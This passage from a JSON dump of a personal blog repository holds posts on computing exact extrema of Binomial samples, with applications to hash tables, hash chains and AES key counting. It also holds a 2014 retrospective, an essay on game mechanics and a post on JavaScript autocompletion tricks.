universe,\nsuch as $`n = 2^{256}`.\n\nAs a consequence,\n[solving the problem of the balls into bins is done inexactly][Gon81],\nthrough approximations such as $`\\frac{\\log(n)}{\\log(\\log(n))}`.\nWe wish to compute exact results here.\n\n## 1. 
Generic Derivation\n\nConsider a distribution with probability density function $`\\varphi`.\nIts associated random variable, $`X`, can be either real-valued or discrete.\n\nWe observe a sample of $`N` independent values taken from that distribution.\n\nThe question we ask is:\nWhat is the range of values that have a probability ≥ $`\\gamma`\n(across samplings of $`N` values) of appearing in the sample?\nFor instance, for a mean range, one would pick $`\\gamma = \\frac{1}{2}`.\n\nDespite being potentially continuous, we can examine the probability\nthat a given value appears at least once in the sample.\nThat is $`1 - P_{excluded}`, where $`P_{excluded}` is the probability\nthat the value does not appear in the sample.\n\nIn turn, given that the sample is independently drawn each time,\nthe probability that a value is never drawn\nis $`P_{excluded} = (1 - \\varphi(x))^N`.\n\nThus, the probability that a given value is in the sample\nis $`1 - (1 - \\varphi(x))^N`.\nBy definition, the values in range are those for which that probability is at least $`\\gamma`:\n$`1 - (1 - \\varphi(x))^N \\geq \\gamma`.\nRearranging, $`(1 - \\varphi(x))^N \\leq 1 - \\gamma`,\nso the values $`x` that are in range follow the equation:\n\n```latex\n\\varphi(x) \\geq 1 - \\sqrt[N]{1 - \\gamma}\n```\n\nWhen $`\\varphi` is a bell curve distribution,\nthe corresponding equality has two solutions for $`x`.\n\n## 2. Application to the Normal\n\nSome bell distributions are more easily invertible.\nThankfully, *this is true of the Normal distribution*,\nwhich will enable us to produce good estimations for all distributions,\nthanks to the **central limit theorem**.\n\nFirst, let us derive the exact Normal solution.\nWe have $`\\varphi(x) : \\mathcal{N}(\\mu, \\sigma^2)`:\n\n```latex\n\\varphi(x) = \\frac{e^{-\\frac{(x-\\mu)^2}{2\\sigma^2}}}{\\sqrt{2\\sigma^2\\pi}}\n```\n\nThus the solution to the general inequality is:\n\n```latex\nx \\in \\left[\n \\mu \\pm \\sqrt{-2\\sigma^2\n \\ln(\\sqrt{2\\sigma^2\\pi}(1-\\sqrt[N]{1-\\gamma}))}\n\\right]\n```\n\nFrom this, we can compute the maximum and minimum exactly,\nalong with the mean range, which follows this formula:\n\n```latex\n2\\sqrt{-2\\sigma^2 \\ln(\\sqrt{2\\sigma^2\\pi}(1-\\sqrt[N]{1-\\gamma}))}\n```\n\n## 3. Application to the Binomial\n\nThe PDF of a binomial distribution $`\\beta(x) : \\mathcal{B}(m, p)`,\nthe probability of a number $`x` of positive events\namong $`m` events with probability $`p` of positivity,\nfollows this equation:\n\n```latex\n\\beta(x) = {m \\choose x} p^x (1-p)^{m-x}\n```\n\nWhile $`x` is a discrete integer,\nthe distribution of $`\\mathcal{B}(m, p)` is also bell-shaped.\nThus the generic derivation above can also be applied.\n\nTwo issues arise when using that derivation, however:\n\n- Unlike the Normal, the binomial coefficient cannot be elegantly **inverted**,\n which prevents us from producing an exact formula.\n- For large values of $`m - x` (around $`2^{128}`),\n calculating that binomial coefficient exactly\n is **too computationally expensive** to yield a result within a lifetime.\n\nWe can however devise an algorithmic method\nby which we obtain an exact answer regardless.\n\nThe first issue can be solved by computing $`\\beta(x)` for all values of $`x`\nuntil the bell curve plummets back below $`\\tau = 1-\\sqrt[N]{1-\\gamma}`.\nHowever, that method is impractical when $`x_{max}` is too large.\n\nInstead of going through each value of $`x`,\nour algorithm can search for the right value\nthrough increasingly accurate approximations,\nsimilar to the way Newton’s method works.\n\nThis convergence works by:\n\n1. 
Using the best model we have of the distribution,\n2. Gathering information from the estimated root,\n3. Updating the model to be even more precise,\n4. Iterating, similar to an interpolation search,\n until eventually, we find two consecutive integers\n $`x_{max}` and $`x_{max}+1` where the first is above the limit\n (obtained from the generic derivation),\n and the other is not.\n\nThe two challenges in implementing this algorithm are:\n\n- Problem 1: Evaluating $`\\beta(x)` is too expensive for large $`x`\n using integer arithmetic operations,\n- Problem 2: Establishing a good and computable model for the distribution,\n and updating it in such a way that ensures eventual and fast convergence.\n\n### 3.1. Evaluating the PDF\n\nWe use the classic solution:\nfirst, convert the binomial coefficient formula to use the Gamma function.\n\n```latex\n\\beta(x) = \\frac{\\Gamma(m+1)}{\\Gamma(x+1)\\Gamma(m-x+1)} p^x (1-p)^{m-x}\n```\n\nThen, to avoid handling large gamma results,\nwe rely on an exact computation of the log-gamma.\nWe can use an arbitrary-precision library\nto ensure we get an error below the integer result we end up with.\n(To find the right precision to set for the algorithm,\nwe can rely on exponential binary search.)\n\n```latex\n\\beta(x) = e^{\n \\ln\\Gamma(m+1) - \\ln\\Gamma(x+1) - \\ln\\Gamma(m-x+1)\n + x \\ln(p) + (m-x) \\ln(1-p)\n}\n```\n\n### 3.2. Converging to the range extrema\n\nGiven the shape of the PDF, and its reflectional symmetry,\nwe can *bound* the expected maximum sample to be between the mean\nand the end of the curve.\n\n```latex\nmp \\leq x_{max} \\leq m\n```\n\nWe set those bounds as $`x_{low}` and $`x_{high}`,\nand estimate the value of $`x_{max}` from its Gaussian approximation:\n\n```latex\n\\hat{x}_{max} = \\left\\lceil\n mp + \\sqrt{-2mp(1-p)\n \\ln(\\sqrt{2mp(1-p)\\pi}(1-\\sqrt[N]{1-\\gamma}))}\n \\right\\rceil\n```\n\nWe can then compute the accurate value of $`\\beta(\\hat{x}_{max})`.\nIf that value is below $`\\tau`, we are too far:\nwe set the upper bound $`x_{high}` to our $`\\hat{x}_{max}` estimate.\nOtherwise, we set $`x_{low}` to it instead.\n\n<figure>\n <img alt='Plot of overlaid Binomial and Normal distributions'\n src='../assets/mean-range-of-a-bell-curve-distribution/binomial-normal-range.svg'>\n <figcaption><p>Plot of 𝔅(200, 10<sup>-1</sup>) in red,\n and its approximating Gaussian in blue.\n τ is shown in green.\n Note how the Normal approximation is off by one on the minimum,\n but the shape of its curve is a good fit locally,\n apart from being horizontally off.\n </figcaption>\n</figure>\n\nThen, we must **improve our estimated model**.\n\n*Newton’s method* is insufficient,\nbecause it does not guarantee convergence,\nand because its convergence is comparatively slow\nas a result of the flatness of the curve.\n\n*Binary search*, taking the average of $`x_{low}` and $`x_{high}`,\nproduces a reliable convergence in $`O(\\log(m))`,\nbut it does not use our existing knowledge of the shape of the curve.\n\nThe normal curve is quite a good approximation,\nespecially with large values.\n(With small values, the convergence is fast anyway.)\n\nHowever, past the first estimation,\nthe normal curve is too far from where the binomial curve intersects $`\\tau`.\nThus we must slide it, either to the left or to the right,\nso that it coincides laterally\nwith the real point $`\\{\\hat{x}_{max}, \\beta(\\hat{x}_{max})\\}`\nwhose abscissa is an estimate of $`x_{max}`.\n\nThat new curve is another Gaussian distribution,\nwith a mean that solves the 
equation\n$`\\varphi_{\\mu, \\sigma^2}(\\hat{x}_{max}) = \\beta(\\hat{x}_{max})`:\n\n```latex\n\\mu = \\hat{x}_{max} - \\sqrt{-2\\sigma^2\\ln(\n \\beta(\\hat{x}_{max})\n \\sqrt{2\\sigma^2\\pi}\n )}\n```\n\nHowever, there is no guarantee that it will intersect $`\\tau`\nbetween $`x_{low}` and $`x_{high}`.\nAs a fallback, if it is out of bounds, we ignore the normal estimate\nand use the average of $`x_{low}` and $`x_{high}`,\njust like binary search.\n\nOnce the bounds $`x_{low}` and $`x_{high}`\nhave converged into adjacent integers,\nwe have found $`x_{max} = x_{low}`.\n\nAs for $`x_{min}`, the process is symmetrically identical,\nexcept it occurs within the bounds:\n\n```latex\n0 \\leq x_{min} \\leq mp\n```\n\nand using the following mean update, reminiscent of the previous one:\n\n```latex\n\\mu = \\hat{x}_{min} + \\sqrt{-2\\sigma^2\\ln(\n \\beta(\\hat{x}_{min})\n \\sqrt{2\\sigma^2\\pi}\n )}\n```\n\nThe algorithmic complexity of the convergence is in $`O(\\log(m))` worst-case,\ndegrading to binary search, but is empirically $`O(\\log(\\log(m)))` on average:\n\n<figure>\n <img alt='Plot of iteration count'\n src='../assets/mean-range-of-a-bell-curve-distribution/convergence-speed.svg'>\n <figcaption>\n <p>Plot of the number of iterations necessary to reach convergence,\n when computing the maximum of a sample of 2<sup>i</sup> elements\n from a Binomial 𝔅(2<sup>i</sup>, 2<sup>-2i</sup>) distribution, in blue.\n In red is log<sub>2</sub>(i),\n which matches the shape of convergence speed asymptotically.\n <p>Not shown is the number of iterations for binary search.\n It would be a straight diagonal: 2<sup>i</sup> takes i iterations.\n </figcaption>\n</figure>\n\n## 4. Balls Into Bins\n\nThis result allows exact computation of solutions for a well-known problem:\n*“Given $`N` balls each randomly placed into $`R` bins,\nhow many do the most and least filled bins have?”*\n\nThe problem is a sampling of $`N` values\nof the Binomial distribution $`\\mathcal{B}(N, \\frac{1}{R})`.\nThus, the mean maximum and minimum are its solutions.\n\nThe widget at the top of the page gives an instant and exact result\nfor this problem, for values below $`2^{1024}`.\n\n### 4.1. Hash tables\n\nOne use for this problem is in assessing the worst-case complexity\nof **hash table** operations to match operational requirements.\nIndeed, the hash output is meant to be uniformly distributed;\nin other words, a [PRF][]: one such example is [SipHash][].\n\nSince the implementation of hash collisions typically requires linear probing,\nlibrary developers strive for a bounded maximum number of hashes\nthat map to the same table entry. Typically, they use a [load factor][]:\nif more than 87.5% of the table is filled,\nthe table size is doubled and rehashed.\n\nThe widget above can help show that\nthis approach does not yield a bounded maximum,\nby inputting `0.875*2^i` balls into `2^i` bins:\n\n<table>\n <tr><th> Table size <th> Max bucket size\n <tr><td> 2<sup>8</sup> <td> 4\n <tr><td> 2<sup>16</sup><td> 7\n <tr><td> 2<sup>32</sup><td> 11\n <tr><td> 2<sup>64</sup><td> 19\n</table>\n\nAs you can see, the growth is very slow,\nwhich satisfies engineering constraints.\nIf there were some imperative to be bounded below a certain value,\nthe table algorithm could use the principles laid out in this article\nto dynamically compute the load factor\nthat keeps the maximum bucket size below the imposed limit.\n\n(A notable exception to this result is [Cuckoo Hashing][],\nwhose maximum bucket size has a different formula.)\n\n### 4.2. 
Hash chains\n\nAnother situation where this problem finds relevance is in **cryptography**.\nFirst, in the field of collision-resistant functions.\nIn a [hash chain][], the root hash has a single hash as input.\nThe 256-bit input of the SHA-256 primitive randomly maps to its 256-bit output.\nThere will be one particular hash output that 57 distinct inputs produce.\nThe pigeonhole principle dictates that this removes possible outputs;\nand indeed, about 37% of the $`2^{256}` possible output hashes\ncannot be produced.\nIn other words, if you take a random 256-bit hex string,\nit will not be a valid output in one case out of three.\n\nIndeed, the probability that a bin has no balls\nafter the first link in the chain is\n$`\\beta_{n = 2^{b},\\,p = 2^{-b}}(0)\n= (1 - 2^{-b})^{2^{b}}\n\\xrightarrow{\\, b \\rightarrow \\infty \\,} \\frac{1}{e}`\nfor a $`b`-bit hash.\nOn the $`i`-th link of the chain, the same phenomenon strikes again,\nand only a fraction $`h_i = 1 - (1 - 2^{-b})^{2^{b}h_{i-1}}` of outputs remains\n(with $`h_0 = 1` since we start with 100%).\n\nOf course, after that initial 37% loss, the subsequent losses are lesser,\nbut $`h_i \\xrightarrow{\\, i \\rightarrow \\infty \\,} 0`.\nAfter just 100 iterations, only 2% of possible hashes remain.\nAfter the typical 10k iterations of [PBKDF2][], only 0.02% remain.\n\nIt is not a vulnerability per se:\nit only removes about 13 bits off a 256-bit space,\nor 7 bits of security against collision resistance.\nTechnically, when the number of iterations reaches $`2^{\\frac{b}{2}}`,\nthe probability formula breaks down;\na hash chain will loop around after an average of $`2^{\\frac{b}{2}}` operations.\nStill, it showcases how simple designs can yield subtle consequences.\n\n### 4.3. Block ciphers\n\nConsider an ideal $`b`-bit block cipher (PRP) using a $`b`-bit key,\nas with [AES-128][AES].\nWe are an attacker examining a $`b`-bit ciphertext block\ngenerated from the encryption of a low-entropy plaintext block of the same size.\n\nWhile it is true that for a given key,\neach plaintext block produces a single ciphertext block and vice-versa,\nfor a given ciphertext block, each key maps to a random plaintext block.\nKeys can be seen as balls, and plaintext blocks as bins.\n\nThus, conversely, about $`\\frac{100}{e} \\approx 37\\%` of plaintext blocks\nhave zero keys that decrypt the ciphertext to them.\nThus, if the plaintext block contained a single bit of information,\nsuch as a presidential vote in a majoritarian election,\n*and if finding the number of valid keys was computationally feasible*,\nthe adversary could decrypt the vote with probability $`\\frac{1}{e}`.\n\nYet again, it is not a vulnerability,\nsince the only currently-known way to do so is to brute-force the key,\nbut it creates an unintuitive attack that a larger key would dismiss.\n\nSimilarly, in an indistinguishability under chosen-plaintext attack (IND-CPA)\nagainst an ideal $`b`-bit block cipher with a $`2b`-bit key,\nas [AES-256][AES] is assumed to be,\nthe set of possible couples of plaintext/ciphertext blocks\nhas $`2^{b+b} = 2^{2b}`, while the set of keys has $`2^{2b}`.\nSince the latter randomly map to the former,\nwhen sending two plaintexts and receiving the encryption of one of them,\nthere is no possible key that encrypts the secretly discarded plaintext\nto the provided ciphertext, with probability $`\\frac{1}{e}`.\n*Assuming again that we can simply compute whether there exists no valid key\nthat encrypts a plaintext to a ciphertext* in polynomial time,\nwe would expect to need a mere 
three plaintext queries before we can tell\nwhich of the two plaintexts sent every time, the first or the second,\nis the one that gets encrypted, with an advantage of 1.\n\nAlso, we can now say precisely that,\nin a known-plaintext attack (KPA) with [AES-256][AES],\n*the single known plaintext/ciphertext pair can have at most 57 valid keys*\nthat do encrypt the plaintext block to the ciphertext block, on average.\nThat is the number of balls\nin the most filled of $`2^{256}` bins receiving $`2^{256}` balls.\nHaving that many keys is unlikely however:\n58% of all valid pairs will have a single valid key, 29% will have two,\n10% will have three, and so forth.\n\nFinally, still in [AES-256][AES], for a given ciphertext block,\nthe plaintext block with the most keys decrypting to it ($`K_{max}`)\nhas about 600 quintillion more keys\nthan the plaintext block with the least keys ($`K_{min}`),\nmaking it more likely.\nThat may superficially seem like a disadvantage\nof using larger keys than the block size.\nHowever, the advantage gained compared to the least likely plaintext block\nis only an increase in probability of\n$`\\frac{K_{max}-K_{min}}{2^{256}} = 2^{-187}`,\nwhich is not only extremely negligible, but also smaller than in AES-128\n($`\\frac{K_{max_{128}}-K_{min_{128}}}{2^{128}} = 2^{-123}`).\n\n## Conclusion\n\nWe described an exact formula for the mean range\nand extrema of a Normal distribution.\nWe used it to produce an algorithm\nthat can compute the extrema of any bell curve distribution,\nwith the example of the Binomial distribution.\nWe optimized that algorithm to run in $`O(\\log(\\log(m)))` average time,\nand discussed a few exact consequences that used to be unconfirmed approximations.\n\n[Har54]: https://sci-hub.se/10.1214/aoms/1177728848\n[Abd54]: https://sci-hub.se/10.1111/j.1467-9574.1954.tb00442.x\n[Gon81]: https://sci-hub.se/10.1145/322248.322254\n[PRF]: https://eprint.iacr.org/2017/652.pdf\n[SipHash]: https://www.aumasson.jp/siphash/\n[load factor]: https://github.com/rust-lang/hashbrown/blob/805b5e28ac7b12ad901aceba5ee641de50c0a3d1/src/raw/mod.rs#L206-L210\n[Cuckoo Hashing]: http://www.cs.toronto.edu/~noahfleming/CuckooHashing.pdf\n[hash chain]: https://sci-hub.se/10.1145/358790.358797\n[PBKDF2]: https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-132.pdf\n[AES]: https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.197.pdf\n\n**Bibliography:**\n\n- [Hartley, H. O., & David, H. A. (1954). Universal Bounds for Mean Range and Extreme Observation. The Annals of Mathematical Statistics, 25(1), 85–99. doi:10.1214/aoms/1177728848][Har54]\n- [Abdel-Aty, S. H. (1954). Ordered variables in discontinuous distributions. Statistica Neerlandica, 8(2), 61–82. doi:10.1111/j.1467-9574.1954.tb00442.x][Abd54]\n- [Gonnet, G. H. (1981). Expected Length of the Longest Probe Sequence in Hash Code Searching. Journal of the ACM, 28(2), 289–304. doi:10.1145/322248.322254][Gon81]\n- [Lamport, L. (1981). Password authentication with insecure communication.\n Communications of the ACM, 24(11), 770–772. 
doi:10.1145/358790.358797][hash\n chain]\n\n<script async src=\"../assets/mean-range-of-a-bell-curve-distribution/mp-wasm.js\"></script>\n<script async src=\"../assets/mean-range-of-a-bell-curve-distribution/normal-mean-range.js\"></script>\n<script async src=\"../assets/mean-range-of-a-bell-curve-distribution/binomial-mean-range.js\"></script>\n<script async type=module src=\"../assets/mean-range-of-a-bell-curve-distribution/cli-calculator.js\"></script>\n<script defer type=module>\nimport Calculator from '../assets/mean-range-of-a-bell-curve-distribution/cli-calculator.js';\n\nfunction initBallsIntoBins(mpWasm) {\n const calc = new Calculator(mpWasm);\n calc.mpf.setDefaultPrec(1024);\n const updateBallsIntoBins = function() {\n ballsErrors.textContent = '';\n const balls = calc.compute(ballsInput.value);\n if (balls.errors.length > 0) {\n ballsErrors.innerHTML = balls.errors.map(e => e.toString()).join('<br>');\n return;\n }\n const nballs = balls.result[0];\n ballsOutput.value = nballs.round().toString();\n\n const bins = calc.compute(binsInput.value);\n if (bins.errors.length > 0) {\n ballsErrors.innerHTML = bins.errors.map(e => e.toString()).join('<br>');\n return;\n }\n const nbins = bins.result[0];\n binsOutput.value = nbins.round().toString();\n\n const range = binomialRange(nballs, calc.mpf(1).div(nbins), nballs);\n minOutput.value = range.min.toString();\n maxOutput.value = range.max.toString();\n rangeOutput.value = range.range.toString();\n };\n ballsInput.addEventListener('input', updateBallsIntoBins);\n binsInput.addEventListener('input', updateBallsIntoBins);\n updateBallsIntoBins();\n}\n\naddEventListener('DOMContentLoaded', () => {\n fetchMPWasm('../assets/mean-range-of-a-bell-curve-distribution/mp.wasm')\n .then(mpWasm => {\n const mpf = window.mpf = mpWasm.mpf;\n initBallsIntoBins(mpWasm);\n });\n});\n</script>\n\n---\n\n[Comments on Reddit](https://www.reddit.com/r/espadrine/comments/n37wiw/mean_range_of_bell_curve_distributions/).\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2021-05-02T14:52:56Z\",\n \"keywords\": \"stats, crypto\" }\n</script>\n"
},
{
"alpha_fraction": 0.7327259182929993,
"alphanum_fraction": 0.7494305372238159,
"avg_line_length": 56.260868072509766,
"blob_id": "01e2242ca7f948989d8bea3948343b655841c514",
"content_id": "138e5ecb567088460ad8590d1f8fd0ce72149197",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1321,
"license_type": "no_license",
"max_line_length": 219,
"num_lines": 23,
"path": "/blog/src/what-i-made-on-year-2014.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# What I Made On Year 2014\n\nOpen-source-wise:\n\n- http://Shields.io (The first commit was, in fact, a year ago)\n- A syntax sheet converter [Ace → CodeMirror](https://github.com/espadrine/ace2cm)\n- [Live AsciiDoc Editor](http://espadrine.github.io/AsciiDocBox/) (side-by-side)\n- Node Canvas [SVG support](https://github.com/Automattic/node-canvas/pull/465). Write your node code with a Canvas API, get SVG back out.\n- http://TheFileTree.com passwords and program jail, although I keep those features hidden. This year, it will allow you to write LaTeX and get the PDF back from anywhere.\n- Not My Territory, a game I design: I got its rules right. Now, to finish implementing it…\n\nOtherwise, I got a diploma in engineering, got hired at https://www.capitainetrain.com, implemented comfort classes (a sub-division of travel classes for some trains), a card store page, invoices and a few other things.\n\nIt's quite fun to no longer be tied to strange decisions and absurd, chronophage school projects.\n\nI hope to do even bigger things this year, many being continuations on this year's achievements, some (hopefully) being outstanding surprises.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2015-01-03T22:51:00Z\",\n \"keywords\": \"retro\" }\n</script>\n"
},
{
"alpha_fraction": 0.7844586372375488,
"alphanum_fraction": 0.7872552871704102,
"avg_line_length": 165.86666870117188,
"blob_id": "3269579f72f864b940b4af8d44af595fb426e917",
"content_id": "2870e4182a898f64b69a41dc82ff7ef761a08e02",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5006,
"license_type": "no_license",
"max_line_length": 795,
"num_lines": 30,
"path": "/blog/src/an-essay-on-ludic-wars.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# An Essay On Ludic Wars\n\nWorking on game design has made me quite receptive to the unfathomed diversity of gameplay techniques, and on their mimesis.\n\nIndeed, the mechanisms in use for simulated combat are not the monopoly of combat games. It is all abstract mathematics in the end. But the systems in use are designed to achieve that ultimate goal of games and entertainment: a player should never know who wins, up until the very last, glorious move.\n\nThe most obvious play to settle on is the **Game of Numbers**. Whoever has the highest number wins. This is in the most rudimentary game of dice, in the War card game, and to some extent in many exchangeable card games. Many games which pretend to feature complex statistical battles can easily be reduced to a Game of Numbers. Most casino games are, as well, given the illegitimacy of techniques such as card counting.\n\nThe issue is that the main driver of player interest, choice, is absent from that design, reducing it to a sandbox simulation for the player to watch. It can be fun in a look-at-an-anthill kind of way; it just isn't *that* kind of fun. Especially when the player realizes that, in the grand scheme of things, *they are the ant*.\n\nHere is another mechanism. I call it \"**Rock Paper Scissors**\". You have atomic units to which are assigned traits. Some traits give an immediate, hard-coded advantage against hand-picked others. Those traits create a mathematical oriented graph, where each vertex is a trait. Usually, the graph is set to be circularly orientated, so that it can be approximated by a [Lotka Volterra](http://en.wikipedia.org/wiki/Lotka_volterra) [simulation](http://espadrine.github.io/lotka-volterra/). It ensures that the player can't stand on one foot, that they cannot rely on the best option, because which trait is the best option alternates with time. This generates an emergent skill game where player choice is king: learn the Lotka curves, and choose which trait to assign to units to beat the odds.\n\nFind this in most strategy games, both RTS and TBS. Many exchangeable card games have that, too, let alone the famed titular game.\n\nOne last mechanism. **Move Traits**. Most successful in Chess and all its derivatives, it is designed to give different move operations to units of different traits. It is heavily seen in RTS: each unit can move on different terrain (land, sea, air) with different speeds. The realism greatly impedes on the combinatorial explosion this mechanism gives, which is too bad, since that is what creates Chess' emergent gameplay from seemingly simple rules.\n\nOf course, this is far from an exhaustive list. Go uses a completely different system, **Constriction**. Surround an enemy, remove all of the air (or a particular resource), and they die. This mechanism appears in a reminiscing way in modern RTS games, through their implementation of economy, and the resulting attrition game it generates. However, yet again, the attempt at realism destroys the potential for interesting choices: instead of a global economy, one in which you can trade a part of your territory for a more important piece. I wonder why global economies are still a thing in games. In the end, it makes the only interesting resource in those game not metal, nor gold, nor lumber, but people. All other resources are global, and therefore, generate no amount of relevant choices.\n\nAbove all, the game mechanic that I am most afraid of, and which a poor attempt at the Constriction system leads to, is **The Waiting Game**. 
This system is designed to make you wait for the completion of a building, or the collection of resources, or the exploration of a map. It is directly designed to both make the game realistic, which it needn't be (and never is anyway), and to give ponderation to elements of the economy. *This takes more time to make, but is more valuable!* The Waiting Game literally makes the player wait artificially for something which could be executed instantly, creating a map from a make-believe economy to something that actually holds value, the passing time.\n\nHowever, The Waiting Game interrupts suspension of the player's disbelief and forces them to multitask into chores which were not the actions they wanted to make, nor the game they wanted to play. I won't even go into the paroxysm of this, so-called free to play games that add one layer to the mapping of fake value to real value by offering to exchange wasted player time with fiat money.\n\nWhere I am heading with these thoughts is this: just like tools can work together to make a huge variety of outstanding devices and objects, these game mechanics can be combined to make a plethora of games with outstanding behaviors. Unfortunately, most games combine them in the same way, leaving much of the vector space of all possible great games unexplored.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2014-08-14T12:42:00Z\",\n \"keywords\": \"\" }\n</script>\n"
},
{
"alpha_fraction": 0.7833535671234131,
"alphanum_fraction": 0.7886598110198975,
"avg_line_length": 193,
"blob_id": "b50a20a838dd2464545b392f003203f60b4e1ffe",
"content_id": "69894d90dcdd4557dfa1bfc61274f859755534f5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6596,
"license_type": "no_license",
"max_line_length": 1037,
"num_lines": 34,
"path": "/blog/src/aulx-the-tricks.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Aulx: The Tricks\n\nAulx is an autocompletion engine for the Web. It is ongoing work, but you can look at it [here](https://github.com/espadrine/aulx) and try it [there](http://espadrine.github.io/aulx/). Here, I am going to focus on JS autocompletion, and talk about two specific tricks I implemented.\n\n# The Contextualizer\n\nOne of the challenges of writing an autocompletion system is that we need to learn from partially written code, since it is still being edited. A common approach is to write a separate parser that is able to recover from missing parentheses, unmatched braces, any incorrect syntax. For example, Tern's Acorn parser relies on indentation to derive the correct braces. This costs some performance in the parser, and there is no \"silver bullet\" implementation, no royal algorithm that works intuitively in all cases.\n\nFalling that, I decided to do the obvious heuristic. It turns out that, in most of the code you write, newlines are significant. They mean that you are going from one procedural statement to the next. Even when they are mid-statement, your code probably is readable by a simple parser when you write the code. If your code really isn't parseable, we simply keep the latest information. Then, we keep it up-to-date when we can.\n\nHowever, given that, how would you know where the cursor is? How would you determine when to suggest what, without an abstract syntax tree? For that purpose, I create a contextualizer which only relies on a lexer. Based on the list of tokens produced, we can find the position of the cursor. Then, depending on which token precedes it, we obtain all the information we would need. We know when we have dot completion, we know all the identifiers defining the successive properties to suggest from, and so on. A remarkable advantage of this technique is that you can figure out where the cursor is (\"contextualize\") even with very improper code, and give some good suggestions nonetheless. Indeed, the lexer will succeed with any code which the error-tolerant JS parser can eat, and then some.\n\nSo, I wrote Esprima's lexer. The one, famous pain point there is that in JS, it is notably hard to discriminate the use of `/` (slash) as a division symbol and as a regular expression marker. The usual method is to rely on the parser, running on the side, for hints. That, however, means that we need to run the parser when running the lexer, which both has a performance cost, and may throw if the code isn't syntactically correct. Fortunately, Tim Disney from Mozilla [discovered](http://disnetdev.com/blog/2012/12/20/how-to-read-macros/) a way to properly lex code without the use of a parser. I implemented his algorithm in Esprima, and it is now merged upstream.\n\nThat said, the lexer has a performance cost of itself. I wanted to minimize that as much as possible. It turns out that, again, the idea that JS code has implicitly significant newlines turns out to be great. Indeed, that has an impact on the tokenizing rules. Newlines are not allowed in single-line comments, nor in regular expressions, which means that I could cut corners quite a bit. In the end, I proved that we only really need to lex the line the cursor is on, and go through a \"shortcut\" algorithm for all the code leading to that line. That shortcut only needs to keep track of string literals and multiline comments. 
Indeed, the productions that can include a line terminator are MultilineNotAsteriskChar, MultilineNotForwardSlashOrAsteriskChar, LineContinuation (for strings), and InputElementDiv and InputElementRegExp, those last two being only used to distinguish between the `/` for division and for regular expressions, which we are not concerned with. That makes the contextualizer remarkably fast in common situations.\n\n# Type as in Interface\n\nAnother thing I wanted to try was a design that absorbed information wherever it could. Useful data, I reasoned, is twofold. One may either wish to search for a specific property / variable name / symbol, to type it faster, or may wish to look up all properties available in an object, for exploratory purposes. Never underestimate the power of exploratory programming. There's always something you stumble upon and that will make you go \"heh, that looks sweet!\" The other day, I noticed that Firefox had `navigator.mozSms`, on the desktop version. I looked it up, it turns out that it has been deprecated in favor of `navigator.mozMobileMessage`. And boom, you find [this spec draft](http://www.w3.org/2012/sysapps/messaging/) dealing with mobile messaging, with editors from Telefonica and Intel. Fumbling through APIs with your eyes wide open can give you accidental ideas, and refresh your memory. Hey, I had forgotten about `navigator.onLine`!\n\nAs a language tool, you can either be very strict about types, and require a lot of written type information from the developer with the implicit promise that this strictness will bring her more tooling information, or you can eat every piece of information you find lying on the floor, and use that. Aulx' approach is the hoover one.\n\nOf course, no matter what approach you take, you need to organize the information you aggregate, and for that purpose, in JS, you benefit from having some concept of types. In my case, I gather data from every function call, from every assignment, from every property access. Therefore, I have defined my types as being the *union of all information related to functions*. If a variable was used as a second parameter to a function, that is stored in that variable's type. If we learned that it is an instance of some constructor, that too is stored. Then, on the other side of the fence, each function accumulates information about properties hold by each of their parameter, by their return value, and by their instances (if it is a constructor). That way, when completing properties, all this information is combined to draw the largest and most accurate picture we can.\n\n# Not just JS\n\nAulx is meant for the Web, not just JS. That was the goal from the start. It now has a world-class CSS autocompletion system, which Girish Sharma of [Firefox fame](https://hacks.mozilla.org/2013/08/new-features-of-firefox-developer-tools-episode-25/) contributed. Expect work on HTML autocompletion too. Imagine receiving autocompletion even for inlined JS and CSS! Imagine combining that information so as to provide some DOM / CSS information in your JS!\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2013-08-20T19:41:00Z\",\n \"keywords\": \"js\" }\n</script>\n"
}
] | 59 |
miltinhoc/RP-Python | https://github.com/miltinhoc/RP-Python | e325b5d883510ceadb446cd1bd35bed1df7103d0 | 487c7b5d3f15f950a9a69ac7043cb6c76e2a2d6c | a82cdfcc7ba4313b4c58478c47c71afdad54f379 | refs/heads/master | 2020-04-15T15:58:27.336927 | 2019-01-09T23:48:46 | 2019-01-09T23:48:46 | 164,813,512 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6507720351219177,
"alphanum_fraction": 0.6816530227661133,
"avg_line_length": 32.378787994384766,
"blob_id": "0cdb0055213df69b13f86e0698ee6e58e01c0d32",
"content_id": "18fb23d63e8239a5ec5064e5c0228fc9361cdf3e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2202,
"license_type": "permissive",
"max_line_length": 162,
"num_lines": 66,
"path": "/rp.py",
"repo_name": "miltinhoc/RP-Python",
"src_encoding": "UTF-8",
